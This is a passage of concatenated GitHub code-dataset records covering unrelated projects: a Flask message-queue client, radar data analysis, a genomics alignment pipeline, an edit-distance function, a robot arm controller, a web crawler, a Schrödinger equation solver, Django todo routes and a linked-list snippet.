print(ans)\n","repo_name":"adit-t/competitive-programming","sub_path":"codechef/long-challenges/2019/dec/binxor.py","file_name":"binxor.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30202479274","text":"import asyncio\nimport json\nimport logging\nimport random\nimport string\n\nimport nest_asyncio # noqa: I001\nfrom flask import _app_ctx_stack\nfrom nats.aio.client import Client as NATS, DEFAULT_CONNECT_TIMEOUT # noqa N814; by convention the name is NATS\nfrom stan.aio.client import Client as STAN # noqa N814; by convention the name is STAN\n\n\nclass QueueService():\n \"\"\"Provides services to use the Queue from Flask.\n\n For ease of use, this follows the style of a Flask Extension\n \"\"\"\n\n def __init__(self, app=None, loop=None):\n \"\"\"Initialize, supports setting the app context on instantiation.\"\"\"\n # Default NATS Options\n self.name = 'default_api_client'\n self.nats_options = {}\n self.stan_options = {}\n self.loop = loop\n self.nats_servers = None\n self.subject = None\n\n self.logger = logging.getLogger()\n\n if app is not None:\n self.init_app(app, self.loop)\n\n def init_app(self, app, loop=None,\n nats_options=None, stan_options=None):\n \"\"\"Initialize the extension.\n\n :param app: Flask app\n :return: naked\n \"\"\"\n nest_asyncio.apply()\n self.name = app.config.get('NATS_CLIENT_NAME')\n self.loop = loop or asyncio.get_event_loop()\n self.nats_servers = app.config.get('NATS_SERVERS').split(',')\n self.subject = app.config.get('NATS_FILER_SUBJECT')\n\n default_nats_options = {\n 'name': self.name,\n 'io_loop': self.loop,\n 'servers': self.nats_servers,\n 'connect_timeout': app.config.get('NATS_CONNECT_TIMEOUT', DEFAULT_CONNECT_TIMEOUT),\n\n # NATS handlers\n 'error_cb': self.on_error,\n 'closed_cb': self.on_close,\n 'reconnected_cb': self.on_reconnect,\n 'disconnected_cb': self.on_disconnect,\n }\n if not nats_options:\n nats_options = {}\n\n self.nats_options = {**default_nats_options, **nats_options}\n\n default_stan_options = {\n 'cluster_id': app.config.get('NATS_CLUSTER_ID'),\n 'client_id':\n (self.name.\n lower().\n strip(string.whitespace)\n ).translate({ord(c): '_' for c in string.punctuation})\n + '_' + str(random.SystemRandom().getrandbits(0x58))\n }\n if not stan_options:\n stan_options = {}\n\n self.stan_options = {**default_stan_options, **stan_options}\n\n app.teardown_appcontext(self.teardown)\n\n def teardown(self, exception): # pylint: disable=unused-argument; flask method signature\n \"\"\"Destroy all objects created by this extension.\"\"\"\n try:\n this_loop = self.loop or asyncio.get_event_loop()\n this_loop.run_until_complete(self.close())\n except RuntimeError as e:\n self.logger.error(e)\n\n async def connect(self):\n \"\"\"Connect to the queueing service.\"\"\"\n ctx = _app_ctx_stack.top\n if ctx:\n if not hasattr(ctx, 'nats'):\n ctx.nats = NATS()\n ctx.stan = STAN()\n\n if not ctx.nats.is_connected:\n self.stan_options = {**self.stan_options, **{'nats': ctx.nats}}\n await ctx.nats.connect(**self.nats_options)\n await ctx.stan.connect(**self.stan_options)\n\n async def close(self):\n \"\"\"Close the connections to the queue.\"\"\"\n if self.nats and self.nats.is_connected:\n await self.stan.close()\n await self.nats.close()\n\n def publish_json(self, payload=None, subject=None):\n \"\"\"Publish the json payload to the Queue Service.\"\"\"\n try:\n subject = subject or self.subject\n self.loop.run_until_complete(self.async_publish_json(payload, subject))\n except Exception as err:\n self.logger.error('Error: %s', err)\n raise err\n\n async def publish_json_to_subject(self, payload=None, subject=None):\n \"\"\"Publish the json payload to the specified subject.\"\"\"\n try:\n await self.async_publish_json(payload, subject)\n except Exception as err:\n self.logger.error('Error: %s', err)\n raise err\n\n async def async_publish_json(self, payload=None, subject=None):\n \"\"\"Publish the json payload to the Queue Service.\"\"\"\n if not self.is_connected:\n await self.connect()\n\n await self.stan.publish(subject=subject,\n payload=json.dumps(payload).encode('utf-8'))\n\n async def on_error(self, e):\n \"\"\"Handle errors raised by the client library.\"\"\"\n self.logger.warning('Error: %s', e)\n\n async def on_reconnect(self):\n \"\"\"Invoke by the client library when attempting to reconnect to NATS.\"\"\"\n self.logger.warning('Reconnected to NATS at nats://%s', self.nats.connected_url.netloc if self.nats else 'none')\n\n async def on_disconnect(self):\n \"\"\"Invoke by the client library when disconnected from NATS.\"\"\"\n self.logger.warning('Disconnected from NATS')\n\n async def on_close(self):\n \"\"\"Invoke by the client library when the NATS connection is closed.\"\"\"\n self.logger.warning('Closed connection to NATS')\n\n @property\n def is_closed(self):\n \"\"\"Return True if the connection toThe cluster is closed.\"\"\"\n if self.nats:\n return self.nats.is_closed\n return True\n\n @property\n def is_connected(self):\n \"\"\"Return True if connected to the NATS cluster.\"\"\"\n if self.nats:\n return self.nats.is_connected\n return False\n\n @property\n def stan(self):\n \"\"\"Return the STAN client for the Queue Service.\"\"\"\n ctx = _app_ctx_stack.top\n if ctx:\n if not hasattr(ctx, 'stan'):\n return None\n return ctx.stan\n return None\n\n @property\n def nats(self):\n \"\"\"Return the NATS client for the Queue Service.\"\"\"\n ctx = _app_ctx_stack.top\n if ctx:\n if not hasattr(ctx, 'nats'):\n return None\n return ctx.nats\n return None\n","repo_name":"bcgov/lear","sub_path":"legal-api/src/legal_api/services/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"41187963065","text":"# This is a sample Python script.\nimport sys\n\nfrom DatasetsOp import Datasets\nimport os\nimport pandas as pd\nfrom sklearn.svm import OneClassSVM\nimport matplotlib.pyplot as plt\nfrom numpy import where\nimport numpy as np\n#import cv2\nimport time\nimport math\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n#np.set_printoptions(linewidth=600) #change setting of printing to the terminal\ndatSets = Datasets()\ndata = datSets.LoadDataset_specFrame(datSets.listLabMeas[7],0)\n\n#Create a scatter plot with colors based on the third value\n# plt.clf()\n# plt.xlim(-5,5)\n# plt.ylim(0,9)\n# b1 = plt.scatter(data[:,datSets.x],data[:,datSets.y],c=data[:,datSets.snr], cmap='viridis')\n# cbar = plt.colorbar()\n# #TCFAR =α×Np\n# plt.show()\n\n#Calculation hypotenuse of points for creation dependance of f(hypotenuse) = SNR\ndata_c = np.empty((data.shape[0], data.shape[1] + 1)) # Add one extra column\njdx = 0\nwhile jdx < data.shape[0]:\n calculated_value = math.sqrt(data[jdx,datSets.x]**2+data[jdx,datSets.y]**2)\n data_c[jdx,:-1] = data[jdx, :] #Copy existing data\n data_c[jdx,-1] = calculated_value\n jdx += 1\n\n #Sorting depending on sort_column_index\n#Column index by which you want to sort\nsort_column_index = 9\n# Get the indices that would sort the array based on the specified column\nsorted_indices = np.argsort(data_c[:, sort_column_index])\n# Use the sorted indices to rearrange the entire array\nsorted_data = data_c[sorted_indices]\n\nplt.clf()\nplt.plot(sorted_data[:,9],sorted_data[:,datSets.snr])\nplt.show()\n\nos.chdir(datSets.scriptPath)\nheader = \"frame,detObj,x,y,z,v,snr,noise,label,hypotenuse\"\nnp.savetxt('temp_data_hypotenuse.csv',data_c,delimiter=',', header=header)\n\nsnrTreshold = 120\ndata_underTreshold = []\ndata_aboveTreshold = []\nidx = 0\nprint(data.shape[0])\nprint(data.shape[1])\nwhile idx < data.shape[0]:\n if snrTreshold < data[idx,datSets.snr]:\n #data_aboveTreshold = np.row_stack((data_aboveTreshold,data[idx,:]))\n data_aboveTreshold.append(data[idx, :])\n else:\n #data_underTreshold = np.row_stack((data_underTreshold, data[idx, :]))\n data_underTreshold.append(data[idx, :])\n idx += 1\n\ndata_aboveTreshold = np.array(data_aboveTreshold)\ndata_underTreshold = np.array(data_underTreshold)\n\nprint(\"DAT\", data_aboveTreshold.shape[0])\nprint(\"DUT\", data_underTreshold.shape[0])\n\nplt.clf()\nb1 = plt.scatter(data_aboveTreshold[:,datSets.x],data_aboveTreshold[:,datSets.y],c='black')\nb2 = plt.scatter(data_underTreshold[:,datSets.x],data_underTreshold[:,datSets.y],c='red')\nplt.xlim(-5,5)\nplt.ylim(0,9)\nplt.legend([b1,b2],[\"ATh\",\"UTh\"])\nplt.show()\n\nos.chdir(datSets.scriptPath)\nprint(datSets.scriptPath)\nheader = \"frame,detObj,x,y,z,v,snr,noise,label\"\nnp.savetxt('temp_data.csv',data,delimiter=',', header=header)\n\n\n\n\n\n\n\n\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"libriIPcko/RadarData_MachineLearning","sub_path":"Statistical SC/CFAR treshold/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26088716072","text":"#! /usr/bin/env python3\n\n\"\"\"Preprocessing (flexbar, bowtie2, STAR),\ncreate base genome profile.\n\n\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport sys\n\nimport yaml\n\nimport pbio.ribo.ribo_filenames as filenames\n\nimport pbio.utils.bam_utils as bam_utils\nimport pbio.utils.fastx_utils as fastx_utils\nimport pbio.utils.pgrm_utils as pgrm_utils\nimport pbio.misc.logging_utils as logging_utils\nimport pbio.misc.shell_utils as shell_utils\nimport pbio.misc.utils as utils\n\nfrom rpbp.defaults import default_num_cpus, default_mem, star_executable, \\\n star_options, flexbar_options\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Creates base genome profile.\")\n\n parser.add_argument('raw_data', help=\"The raw data file (fastq[.gz])\")\n\n parser.add_argument('config', help=\"The (yaml) configuration file\")\n\n parser.add_argument('name', help=\"The name for the dataset, used in the created files\")\n\n parser.add_argument('-p', '--num-cpus', help=\"The number of processors to use\",\n type=int, default=default_num_cpus)\n \n parser.add_argument('--mem', help=\"The amount of RAM to request\", default=default_mem)\n\n parser.add_argument('-t', '--tmp', help=\"\"\"The location for temporary files. If not\n specified, program-specific temp locations are used.\"\"\", default=None)\n\n parser.add_argument('--do-not-call', action='store_true')\n\n parser.add_argument('--overwrite', help=\"\"\"If this flag is present, existing files\n will be overwritten.\"\"\", action='store_true')\n\n parser.add_argument('-k', '--keep-intermediate-files', help=\"\"\"If this flag is given,\n then all intermediate files will be kept; otherwise, they will be\n deleted. This feature is implemented piecemeal. If the --do-not-call flag\n is given, then nothing will be deleted.\"\"\", action='store_true')\n\n logging_utils.add_logging_options(parser)\n pgrm_utils.add_star_options(parser, star_executable)\n pgrm_utils.add_flexbar_options(parser)\n args = parser.parse_args()\n logging_utils.update_logging(args)\n\n msg = \"[create-base-genome-profile]: {}\".format(' '.join(sys.argv))\n logger.info(msg)\n\n config = yaml.load(open(args.config), Loader=yaml.FullLoader)\n\n # check that all of the necessary programs are callable\n programs = [\n 'flexbar',\n args.star_executable,\n 'samtools',\n 'bowtie2',\n 'remove-multimapping-reads'\n ]\n shell_utils.check_programs_exist(programs)\n\n required_keys = [\n 'riboseq_data',\n 'ribosomal_index',\n 'gtf',\n 'genome_base_path',\n 'genome_name'\n ]\n utils.check_keys_exist(config, required_keys)\n\n note = config.get('note', None)\n call = not args.do_not_call\n keep_delete_files = args.keep_intermediate_files or args.do_not_call\n\n # Step 0: Running flexbar to remove adapter sequences\n\n raw_data = args.raw_data\n flexbar_target = filenames.get_without_adapters_base(config['riboseq_data'],\n args.name,\n note=note)\n without_adapters = filenames.get_without_adapters_fastq(config['riboseq_data'],\n args.name,\n note=note)\n\n adapter_seq_str = utils.get_config_argument(config, 'adapter_sequence', 'adapter-seq')\n adapter_file_str = utils.get_config_argument(config, 'adapter_file', 'adapters')\n\n # get all options, command line options override defaults\n flexbar_option_str = pgrm_utils.get_final_args(flexbar_options, args.flexbar_options)\n\n cmd = \"flexbar -r {} -t {} {} {} {} -n {}\".format(raw_data,\n flexbar_target,\n adapter_seq_str,\n adapter_file_str,\n flexbar_option_str,\n args.num_cpus)\n in_files = [raw_data]\n out_files = [without_adapters]\n file_checkers = {\n without_adapters: fastx_utils.check_fastq_file\n }\n shell_utils.call_if_not_exists(cmd, out_files, in_files=in_files,\n file_checkers=file_checkers, overwrite=args.overwrite, call=call)\n\n # Step 1: Running bowtie2 to remove rRNA alignments\n\n out = utils.abspath(\"dev\", \"null\") # we do not care about the alignments\n without_rrna = filenames.get_without_rrna_fastq(config['riboseq_data'],\n args.name,\n note=note)\n with_rrna = filenames.get_with_rrna_fastq(config['riboseq_data'],\n args.name,\n note=note)\n\n cmd = \"bowtie2 -p {} --very-fast -x {} -U {} -S {} --un-gz {} --al-gz {}\".format(\n args.num_cpus,\n config['ribosomal_index'],\n without_adapters,\n out,\n without_rrna,\n with_rrna)\n\n in_files = [without_adapters]\n in_files.extend(pgrm_utils.get_bowtie2_index_files(config['ribosomal_index']))\n out_files = [without_rrna, with_rrna]\n to_delete = [without_adapters]\n file_checkers = {\n without_rrna: fastx_utils.check_fastq_file\n }\n shell_utils.call_if_not_exists(cmd, out_files, in_files=in_files,\n file_checkers=file_checkers, overwrite=args.overwrite, call=call,\n keep_delete_files=keep_delete_files, to_delete=to_delete)\n\n # Step 2: Running STAR to align rRNA-depleted reads to genome\n\n star_output_prefix = filenames.get_riboseq_bam_base(config['riboseq_data'],\n args.name,\n note=note)\n genome_star_bam = \"{}{}\".format(star_output_prefix, \"Aligned.sortedByCoord.out.bam\")\n\n # get all options, command line options override defaults\n\n mem_bytes = utils.human2bytes(args.mem)\n star_options['limitBAMsortRAM'] = mem_bytes\n\n if args.tmp is not None:\n star_tmp_name = str(args.name + \"_STARtmp\")\n star_tmp_dir = pgrm_utils.create_star_tmp(args.tmp, star_tmp_name)\n star_options['outTmpDir'] = star_tmp_dir\n\n star_option_str = pgrm_utils.get_final_args(star_options, args.star_options)\n\n # If GFF3 specs, then we need to inform STAR.\n # Whether we have de novo or not, the format of \"config['gtf']\" has precedence.\n sjdb_gtf_tag_str = \"\"\n use_gff3_specs = config['gtf'].endswith('gff')\n gtf_file = filenames.get_gtf(config['genome_base_path'],\n config['genome_name'],\n is_gff3=use_gff3_specs,\n is_star_input=True)\n if use_gff3_specs:\n sjdb_gtf_tag_str = \"--sjdbGTFtagExonParentTranscript Parent\"\n\n cmd = (\"{} --runThreadN {} --genomeDir {} --sjdbGTFfile {} {} --readFilesIn {} \"\n \"{} --outFileNamePrefix {}\".format(args.star_executable,\n args.num_cpus,\n config['star_index'],\n gtf_file,\n sjdb_gtf_tag_str,\n without_rrna,\n star_option_str,\n star_output_prefix))\n in_files = [without_rrna]\n in_files.extend(pgrm_utils.get_star_index_files(config['star_index']))\n to_delete = [without_rrna]\n out_files = [genome_star_bam]\n file_checkers = {\n genome_star_bam: bam_utils.check_bam_file\n }\n shell_utils.call_if_not_exists(cmd, out_files, in_files=in_files,\n file_checkers=file_checkers, overwrite=args.overwrite,\n call=call, keep_delete_files=keep_delete_files, to_delete=to_delete)\n \n # now, we need to symlink the (genome) STAR output to that expected by the rest of the pipeline\n genome_sorted_bam = filenames.get_riboseq_bam(config['riboseq_data'],\n args.name,\n note=note)\n\n if os.path.exists(genome_star_bam):\n shell_utils.create_symlink(genome_star_bam, genome_sorted_bam, call)\n else:\n msg = (\"Could not find the STAR genome bam alignment file. Unless \"\n \"--do-not-call was given, this is a problem.\")\n logger.warning(msg)\n\n # create the bamtools index\n cmd = \"samtools index -b {}\".format(genome_sorted_bam)\n shell_utils.check_call(cmd, call=call)\n\n # check if we want to keep multimappers\n if 'keep_riboseq_multimappers' in config:\n return\n\n # remove multimapping reads from the genome file\n tmp_str = \"\"\n if args.tmp is not None:\n tmp_str = \"--tmp {}\".format(args.tmp)\n\n unique_genome_filename = filenames.get_riboseq_bam(config['riboseq_data'],\n args.name,\n is_unique=True,\n note=note)\n\n cmd = \"remove-multimapping-reads {} {} {}\".format(genome_sorted_bam, \n unique_genome_filename,\n tmp_str)\n\n in_files = [genome_sorted_bam]\n out_files = [unique_genome_filename]\n to_delete = [genome_star_bam, genome_sorted_bam]\n file_checkers = {\n unique_genome_filename: bam_utils.check_bam_file\n }\n shell_utils.call_if_not_exists(cmd, out_files, in_files=in_files,\n file_checkers=file_checkers, overwrite=args.overwrite,\n call=call, keep_delete_files=keep_delete_files, to_delete=to_delete)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rasilab/rp-bp","sub_path":"rpbp/orf_profile_construction/create_base_genome_profile.py","file_name":"create_base_genome_profile.py","file_ext":"py","file_size_in_byte":10302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14680681625","text":"## EDIT DISTANCE FUNCTION To Correct the misspelled words\ndef minDis(s1, s2, n, m, dp) :\n \n if(n == 0) :\n return m \n if(m == 0) :\n return n\n \n if(dp[n][m] != -1) :\n return dp[n][m];\n \n if(s1[n - 1] == s2[m - 1]) : \n if(dp[n - 1][m - 1] == -1) :\n dp[n][m] = minDis(s1, s2, n - 1, m - 1, dp)\n return dp[n][m] \n else :\n dp[n][m] = dp[n - 1][m - 1]\n return dp[n][m]\n \n else : \n if(dp[n - 1][m] != -1) : \n m1 = dp[n - 1][m] \n else :\n m1 = minDis(s1, s2, n - 1, m, dp)\n \n if(dp[n][m - 1] != -1) : \n m2 = dp[n][m - 1] \n else :\n m2 = minDis(s1, s2, n, m - 1, dp) \n if(dp[n - 1][m - 1] != -1) : \n m3 = dp[n - 1][m - 1] \n else :\n m3 = minDis(s1, s2, n - 1, m - 1, dp)\n \n dp[n][m] = 1 + min(m1, min(m2, m3))\n return dp[n][m]\n","repo_name":"Abdullahw72/Breast-Cancer-Chatbot","sub_path":"Backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"fr","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37633536875","text":"#!/usr/bin/env python3.8\n\nimport numpy as np\n\nimport geometry_msgs\nimport moveit_msgs.msg\nfrom sr_robot_commander.sr_arm_commander import SrArmCommander\nimport tf\nfrom typing import Dict\n\nfrom htrc_framework.base_robot_controllers import BaseArmController\nfrom htrc_framework.webcam_controller import HAND_LANDMARKS\n\n\nclass ArmController(BaseArmController):\n def __init__(self, name: str) -> None:\n super().__init__()\n self.commander: SrArmCommander = SrArmCommander(name=name)\n self.orientation: geometry_msgs.msg.PoseStamped.orientation = None\n self.constraints: moveit_msgs.msg.Constraints = None\n\n def set_required_landmarks(self) -> None:\n self.required_landmarks = [\n HAND_LANDMARKS.MIDDLE_FINGER_MCP,\n HAND_LANDMARKS.WRIST,\n ]\n\n def set_constraints(self) -> None:\n \"\"\"\n Set the joint constriants for the robot arm.\n \"\"\"\n\n self.constraints = moveit_msgs.msg.Constraints()\n self.constraints.name = \"all_constraints\"\n\n # Constrain the shoulder lift joint movement\n # Avoids the robot taking indirect routes to goals\n shoulder_lift_constraint = moveit_msgs.msg.JointConstraint()\n shoulder_lift_constraint.joint_name = \"ra_shoulder_lift_joint\"\n shoulder_lift_constraint.position = np.radians(-45)\n shoulder_lift_constraint.tolerance_below = np.radians(45)\n shoulder_lift_constraint.tolerance_above = np.radians(100)\n\n # Set the list of the constraints for every movement\n self.constraints.joint_constraints = [shoulder_lift_constraint]\n\n def move_to_start_pose(self) -> None:\n # Move to the predefined starting position\n self.commander.set_pose_reference_frame(\"ra_base\")\n self.commander.move_to_named_target(\"ra_start\")\n\n # Rotate the wrist so the hand is facing the ground\n self.commander.move_to_joint_value_target_unsafe(\n {\"ra_wrist_3_joint\": -180}, wait=True, angle_degrees=True\n )\n\n current_pose = self.commander.get_current_pose(\"ra_base\")\n\n starting_pose = geometry_msgs.msg.PoseStamped()\n\n # Set the custom starting position for this robot\n starting_pose.pose.position.x = 0.5\n starting_pose.pose.position.y = -0.5\n starting_pose.pose.position.z = current_pose.position.z\n\n # Transform the orientation to Euler from quaternion\n starting_orientation_euler = tf.transformations.euler_from_quaternion(\n (\n current_pose.orientation.x,\n current_pose.orientation.y,\n current_pose.orientation.z,\n current_pose.orientation.w,\n )\n )\n\n # Set the new custom starting orientation and transform it to quaternion\n starting_orientation = tf.transformations.quaternion_from_euler(\n starting_orientation_euler[0], starting_orientation_euler[1], 0\n )\n\n # Add the custom starting orientation to the pose object\n starting_pose.pose.orientation.x = starting_orientation[0]\n starting_pose.pose.orientation.y = starting_orientation[1]\n starting_pose.pose.orientation.z = starting_orientation[2]\n starting_pose.pose.orientation.w = starting_orientation[3]\n\n self.orientation = starting_pose.pose.orientation\n\n self.set_constraints()\n\n # Move the robot to the custom starting position\n self.commander.move_to_pose_value_target_unsafe(starting_pose)\n\n def process_landmark_data(\n self, landmark_data: Dict[str, Dict[HAND_LANDMARKS, float]]\n ) -> Dict[str, float]:\n \"\"\"\n Calculate the end effector goal coordinates from landmark data.\n \"\"\"\n\n # Extract the middle finger MCP data\n mid_finger_x = landmark_data[\"x\"][HAND_LANDMARKS.MIDDLE_FINGER_MCP]\n mid_finger_y = landmark_data[\"y\"][HAND_LANDMARKS.MIDDLE_FINGER_MCP]\n\n # Get the normalised distance from the wrist to the middle finger MCP\n squared_x_dist = (\n landmark_data[\"x\"][HAND_LANDMARKS.WRIST]\n - landmark_data[\"x\"][HAND_LANDMARKS.MIDDLE_FINGER_MCP]\n ) ** 2\n squared_y_dist = (\n landmark_data[\"y\"][HAND_LANDMARKS.WRIST]\n - landmark_data[\"y\"][HAND_LANDMARKS.MIDDLE_FINGER_MCP]\n ) ** 2\n norm_dist = np.sqrt(squared_x_dist + squared_y_dist)\n\n # Map the data to coordinates within the arm end effector's desired range\n arm_position_dict = {\n \"x\": -mid_finger_y + 1,\n \"y\": -mid_finger_x * 2 + 1,\n \"z\": max(0.1, 0.7 - norm_dist),\n }\n\n return arm_position_dict\n\n def publish_move(self) -> None:\n while True:\n # Get data from the queue\n landmark_data = self.data_queue.get()\n\n # Exit thread if end signal received\n if landmark_data == \"END\":\n return\n\n # If there is data in the queue\n if landmark_data is not None:\n arm_position_dict = self.process_landmark_data(landmark_data)\n\n # Construct the geometry message to send to the robot\n target = geometry_msgs.msg.PoseStamped()\n target.pose.orientation = self.orientation\n\n target.pose.position.x = arm_position_dict[\"x\"]\n target.pose.position.y = arm_position_dict[\"y\"]\n target.pose.position.z = arm_position_dict[\"z\"]\n\n # Move the robot\n self.commander.move_to_pose_value_target_unsafe(\n target, wait=False, ik_constraints=self.constraints\n )\n","repo_name":"Aashvin/hand-tracking-robot-control","sub_path":"htrc_controllers/src/htrc_controllers/sr_arm_position_controller.py","file_name":"sr_arm_position_controller.py","file_ext":"py","file_size_in_byte":5656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72275509907","text":"from urllib.request import urlopen #module allows connections to url\nfrom link_finder import LinkFinder\nfrom domain import *\nfrom general import *\n\n#takes the links and then grabs all the links in the html and send it to link finder and \n#add the links to the link finder waiting list.\n#after waiting list it will send the link to crawled list\n\n#(⊙o⊙)\n\nclass Spider:\n #class variables (shared between all the instances)\n project_name = ''\n base_url = '' \n domain_name = ''\n #save file data variables.save data to file\n queue_file = ''\n crawled_file = ''\n #work during execution\n queue = set()\n crawled = set()\n \n def __init__(self, project_name, base_url, domain_name):\n Spider.project_name = project_name\n Spider.base_url = base_url\n Spider.domain_name = domain_name\n Spider.queue_file = Spider.project_name + '/queue.txt'\n Spider.crawled_file = Spider.project_name + '/crawled.txt'\n self.boot()\n self.crawl_page('First spider', Spider.base_url)\n \n @staticmethod #tells that this is static method may not use in class specific code\n def boot():\n create_project_directory(Spider.project_name)\n create_data_files(Spider.project_name, Spider.base_url)\n Spider.queue = file_to_set(Spider.queue_file)\n Spider.crawled = file_to_set(Spider.crawled_file)\n \n @staticmethod\n def crawl_page(thread_name, page_url):\n if page_url not in Spider.crawled:\n print(thread_name + ' now crawling ' + page_url)\n print('Queue ' + str(len(Spider.queue)) + ' | Crawled ' + str(len(Spider.crawled)))\n Spider.add_links_to_queue(Spider.gather_links(page_url))\n Spider.queue.remove(page_url)\n Spider.crawled.add(page_url)\n Spider.update_files()\n\n #connect to site convert 0 1 to readable format\n #passes it to the link finder and finds all the url if ther eis no issue\n @staticmethod\n def gather_links(page_url):\n html_string = ''\n try:\n response = urlopen(page_url)\n if 'text/html' in response.getheader('Content-Type'):\n html_bytes = response.read()\n html_string = html_bytes.decode(\"utf-8\")\n finder = LinkFinder(Spider.base_url, page_url)\n finder.feed(html_string)\n except Exception as e:\n print(str(e))\n return set()\n return finder.page_links()\n\n @staticmethod\n def add_links_to_queue(links):\n #check that link is not in crawl queue list\n for url in links:\n if (url in Spider.queue) or (url in Spider.crawled):\n continue\n if Spider.domain_name != get_domain_name(url):\n continue\n Spider.queue.add(url)\n @staticmethod\n def update_files():\n set_to_file(Spider.queue, Spider.queue_file)\n set_to_file(Spider.crawled, Spider.crawled_file)\n \n \n \n \n ","repo_name":"atif044/Web-Crawler","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69851423185","text":"'''Author- MD ELIOUS ALI MONDAL\r\n Created - 20/12/17'''\r\n#solving the schroedinger equation for finite well\r\nimport time\r\nstart = time.perf_counter()\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#step size for x\r\nh = 0.01\r\n\r\n#no. of x points\r\nn = int(6/h)+1\r\n\r\n#defining the potential\r\ndef V(x):\r\n '''returns V as a function of x'''\r\n if x < -1 or x > 1:\r\n return 10\r\n elif x >= -1 and x <= 1:\r\n return 0\r\n\r\n#defining the function to carry out Numerov method\r\ndef Numerov(x,y1,y2,E):\r\n '''returns y[i+1] value'''\r\n u = 1 - (1/6.)*(h**2)*(V(x)-E)\r\n return ((12-10*u)*y1-u*y2)/u\r\n\r\n#generating the arrays to store the x and Psi values\r\nx = np.linspace(-3,3,n)\r\ny = np.zeros(n)\r\nz = 0.000001\r\ny[1] = z*h\r\n\r\n#defining a function to carry out Numerov for a given E\r\ndef Psi(E):\r\n for i in range(2,n):\r\n y[i] = Numerov(x[i],y[i-1],y[i-2],E)\r\n N_const = 0 #Inverse of square of Normalisation constant\r\n for j in y:\r\n N_const = N_const + j*j*h\r\n A = 1.0/np.sqrt(N_const)\r\n m = A*y\r\n return(m[-1],m)\r\n\r\n#finding the energy values\r\nEigenvalues = []\r\na = np.linspace(0.1,9.9,100)\r\nP = np.array([Psi(i)[0] for i in a])\r\nfor i in range(len(P)-1):\r\n if (P[i]<0 and P[i+1]>0) or (P[i]>0 and P[i+1]<0):\r\n #print(P[i],P[i+1])\r\n low = a[i]\r\n high = a[i+1]\r\n mid = (low + high)/2.\r\n #iteration = 0\r\n while abs(Psi(mid)[0]) > h**2:\r\n mid = (low + high)/2.\r\n if P[i] < 0:\r\n if Psi(mid)[0] < 0:\r\n low = mid\r\n else:\r\n high = mid\r\n elif P[i] > 0:\r\n if Psi(mid)[0] > 0:\r\n low = mid\r\n else:\r\n high = mid\r\n #iteration +=1\r\n Eigenvalues.append(mid)\r\n #print(iteration)\r\n\r\nend = time.perf_counter()\r\ntime_taken = end - start\r\nprint(Eigenvalues)\r\nprint('Time taken to execute the code is ',time_taken,' seconds')\r\n\r\n#Plotting the obtained wavefunction\r\nplt.figure(1)\r\nplt.title('Numerical solution of finite well')\r\n\r\nfor i in Eigenvalues:\r\n q = Psi(i) #0.813086, 3.1956 , 6.8963\r\n plt.plot(x,q[1]+1)\r\n\r\nV = np.array([V(i)/5. for i in x])\r\nplt.plot(x,V,'black')\r\nplt.show()\r\n","repo_name":"EliousMondal/1D-Schrodinger_solver","sub_path":"1D_TISE_py.py","file_name":"1D_TISE_py.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31201736117","text":"from django.urls import path\nfrom django.contrib import admin\nfrom .views import TaskList, TaskDetail, TaskCreate, TaskUpdate ,DeleteView,CustomLoginView,RegisterPage\nfrom django.contrib.auth.views import LogoutView\nfrom . import views\nfrom .views import (TodoListApiView,CustomTokenObtainPairView)\n\nurlpatterns = [\n path('login/',CustomLoginView.as_view(), name='login'),\n path('logout/',LogoutView.as_view(next_page='login'), name='logout'),\n path('register/',RegisterPage.as_view() ,name='register'),\n path('api/tasks/',TaskList.as_view(), name='tasks'),\n path('api/tasks//', TaskDetail.as_view(), name='task'),\n path('api/tasks/create/', TaskCreate.as_view(), name='task-create'),\n path('api/tasks//update/', TaskUpdate.as_view(), name='task-update'),\n path('api/tasks//delete/', DeleteView.as_view(), name='task-delete'),\n # path('api/taskss/', views.TaskListAPIView.as_view(), name='api-task-list'),\n # path('api/tasks//', views.TaskDetailAPIView.as_view(), name='api-task-detail'),\n path('custmam-token/', CustomTokenObtainPairView.as_view(), name='custom-token'),\n path('api/', TodoListApiView.as_view(), name='api-todo-list'),\n]\n\nadmin.site.index_title = 'Ahmed Tarek Radwan(ATR) 🦅 & Dragons 🐉'\nadmin.site.site_header = 'Dragons 🐉'\nadmin.site.site_title = \"TODO_LIST_APP 🦅 \"","repo_name":"ahmedradwan21/TODO__APP","sub_path":"base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"74586960465","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n h1 = l1 = ListNode(0)\n h2 = l2 = ListNode(0)\n\n # Want to get every value to the left of x\n # and every value to the right of x then\n # connect left with right\n while head:\n if head.val < 